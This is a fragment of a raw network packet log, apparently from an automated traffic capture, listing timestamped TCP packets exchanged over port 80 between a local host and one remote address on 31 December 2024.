| Dec 31, 2024 15:42:11.660196066 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.707447052 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.707741976 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.755460024 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.755600929 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.803428888 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.803545952 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.855458975 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.855530024 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.903405905 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.903564930 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.951401949 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.951464891 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.956475973 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.956644058 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.956743002 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.961553097 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961564064 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961623907 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.961666107 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961682081 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961690903 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961704969 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961720943 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.961721897 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961733103 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961741924 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961750984 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961769104 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961774111 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.961777925 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961786985 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961796999 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961801052 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.961882114 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961893082 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961900949 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961910009 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961920977 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961932898 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961945057 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961954117 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961971045 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961980104 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961988926 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.961997032 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962033987 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962044001 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962054014 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962063074 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962073088 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962218046 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.962264061 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962275028 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962285042 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962304115 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962313890 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962321997 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962327957 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.962335110 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962344885 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962354898 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962372065 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962383032 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962392092 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962402105 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962407112 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.962409973 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962416887 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962425947 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962435007 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962452888 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962464094 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962471962 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962481022 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.962491035 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966566086 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966576099 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966620922 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966629982 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966639996 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966656923 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966665983 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966753960 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966912031 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966921091 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966929913 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966938972 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966948032 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966958046 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966974020 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966984034 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.966995001 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967281103 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.967341900 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967354059 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967372894 CET | 49712 | 80 | 192.168.2.3 | 34.147.147.173 |
| Dec 31, 2024 15:42:11.967380047 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967390060 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967407942 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967417955 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967427015 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967431068 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967433929 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967447996 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967467070 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967475891 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967484951 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967489004 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967502117 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967505932 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967510939 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967535973 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967564106 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967581987 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967592001 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
| Dec 31, 2024 15:42:11.967601061 CET | 80 | 49712 | 34.147.147.173 | 192.168.2.3 |
                                        Dec 31, 2024 15:42:11.967653990 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967665911 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967685938 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967694998 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967715025 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967724085 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967732906 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967741966 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967859030 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967869043 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967880011 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967901945 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967911005 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967920065 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967928886 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967937946 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967947006 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967957020 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967961073 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967972040 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.967992067 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.968009949 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.968019009 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.968027115 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.968036890 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.968065023 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.968081951 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.968091011 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.968108892 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.968117952 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.968127012 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972363949 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972374916 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972393036 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972402096 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972531080 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972548008 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972558022 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972565889 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972569942 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972587109 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972596884 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972606897 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972618103 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972625971 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972642899 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972651958 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972677946 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972687960 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972714901 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972723961 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972740889 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972749949 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972790003 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972799063 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972826004 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972835064 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972846031 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972918987 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972928047 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972985983 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.972995043 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973004103 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973012924 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973086119 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973097086 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973107100 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973115921 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973125935 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973144054 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973153114 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973161936 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973177910 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973186970 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973231077 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973239899 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973239899 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.973249912 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973258972 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973278046 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973292112 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973328114 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973339081 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.973340034 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973351002 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.973361015 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978111982 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978214979 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978226900 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978262901 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978271961 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978282928 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978295088 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978315115 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978323936 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978337049 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978355885 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978364944 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978374958 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978395939 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978405952 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978466034 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978475094 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978494883 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978504896 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978522062 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978532076 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978591919 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978604078 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978614092 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978622913 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978641033 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978650093 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978693008 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978703022 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978712082 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978720903 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978739023 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978749037 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978773117 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978790045 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978800058 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978810072 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978851080 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978859901 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978871107 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978893995 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978970051 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978980064 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.978990078 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.979002953 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.979021072 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.979029894 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.979038954 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.979048014 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.979065895 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.979079008 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.979101896 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.979111910 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.979650974 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.979752064 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.984599113 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984608889 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984663010 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984682083 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984745979 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984755993 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984802008 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984812975 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984832048 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984842062 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984918118 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984929085 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984967947 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.984977007 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985014915 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985023022 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.985023975 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985060930 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985070944 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985109091 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985119104 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985155106 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985163927 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985189915 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985202074 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985243082 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985254049 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985282898 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985294104 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985304117 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985313892 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985398054 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985411882 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985430002 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985443115 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985462904 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985475063 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985495090 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985506058 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985541105 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985551119 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985577106 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985585928 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985606909 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985615969 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985645056 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985655069 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985671997 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985682011 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985707998 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985718966 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985747099 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985755920 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.985806942 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.989933014 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.989943981 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.989976883 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.989986897 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990011930 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990020990 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990047932 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990098000 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990107059 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990144014 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990158081 CET804971234.147.147.173192.168.2.3
